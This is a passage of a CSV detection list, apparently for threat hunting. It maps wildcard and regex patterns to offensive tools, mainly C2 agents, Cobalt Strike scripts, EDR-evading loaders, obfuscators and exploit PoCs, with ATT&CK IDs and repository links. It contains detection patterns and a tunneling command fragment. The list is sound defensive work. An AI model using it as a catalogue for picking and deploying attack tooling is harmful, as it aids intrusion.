tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/afp-showmount.nse*",".{0,1000}\/afp\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/afrog-pocs/*",".{0,1000}\/afrog\-pocs\/.{0,1000}","offensive_tool_keyword","afrog","A tool for finding vulnerabilities","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/zan8in/afrog","1","1","N/A","N/A","10","2823","334","2024-04-30T08:02:02Z","2022-02-24T06:00:32Z" "*/agent -connect http* --proxy*",".{0,1000}\/agent\s\-connect\shttp.{0,1000}\s\-\-proxy.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*/agent.ps1.oct*",".{0,1000}\/agent\.ps1\.oct.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*/agent/C/src/*",".{0,1000}\/agent\/C\/src\/.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/agent/stagers/dropbox.py*",".{0,1000}\/agent\/stagers\/dropbox\.py.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*/agent_code/Apollo/*",".{0,1000}\/agent_code\/Apollo\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/agent_code/Athena*",".{0,1000}\/agent_code\/Athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/agent_code/cmd_executor*",".{0,1000}\/agent_code\/cmd_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/agent_code/dll.go*",".{0,1000}\/agent_code\/dll\.go.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*/agent_code/merlin.*",".{0,1000}\/agent_code\/merlin\..{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*/agent_code/powershell_executor*",".{0,1000}\/agent_code\/powershell_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - 
T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/agent_code/sh_executor*",".{0,1000}\/agent_code\/sh_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/agent_code/zsh_executor*",".{0,1000}\/agent_code\/zsh_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/agent_functions/*.py*",".{0,1000}\/agent_functions\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/agent_icons/athena.svg*",".{0,1000}\/agent_icons\/athena\.svg.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/AggressiveClean.cna*",".{0,1000}\/AggressiveClean\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*/aggressor/*.java*",".{0,1000}\/aggressor\/.{0,1000}\.java.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/aggressor-powerview*",".{0,1000}\/aggressor\-powerview.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*/AggressorScripts*",".{0,1000}\/AggressorScripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","150","40","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z" "*/AggressorScripts*",".{0,1000}\/AggressorScripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" "*/AggressorScripts*",".{0,1000}\/AggressorScripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca 
- Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/agscript *",".{0,1000}\/agscript\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/agscript *",".{0,1000}\/agscript\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/ahmedkhlief/Ninja/*",".{0,1000}\/ahmedkhlief\/Ninja\/.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/ahrixia/CVE_2022_0847*",".{0,1000}\/ahrixia\/CVE_2022_0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","1","N/A","N/A","1","22","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" "*/ajp-auth.nse*",".{0,1000}\/ajp\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ajp-brute.nse*",".{0,1000}\/ajp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ajp-headers.nse*",".{0,1000}\/ajp\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ajp-methods.nse*",".{0,1000}\/ajp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ajp-request.nse*",".{0,1000}\/ajp\-request\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/alan.log*",".{0,1000}\/alan\.log.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*/Alan.v*.zip*",".{0,1000}\/Alan\.v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*/Alaris.sln*",".{0,1000}\/Alaris\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*/Alcatraz.exe*",".{0,1000}\/Alcatraz\.exe.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/Alcatraz.git*",".{0,1000}\/Alcatraz\.git.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/Alcatraz/files/*/Alcatraz.zip*",".{0,1000}\/Alcatraz\/files\/.{0,1000}\/Alcatraz\.zip.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/Alcatraz/x64*",".{0,1000}\/Alcatraz\/x64.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/Alcatraz-gui*",".{0,1000}\/Alcatraz\-gui.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense 
Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/all/pupyutils/*.py*",".{0,1000}\/all\/pupyutils\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/All_attack.txt*",".{0,1000}\/All_attack\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*/allseeingeye-info.nse*",".{0,1000}\/allseeingeye\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/amass/wordlists*",".{0,1000}\/amass\/wordlists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Amnesiac.git*",".{0,1000}\/Amnesiac\.git.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/amqp-info.nse*",".{0,1000}\/amqp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - 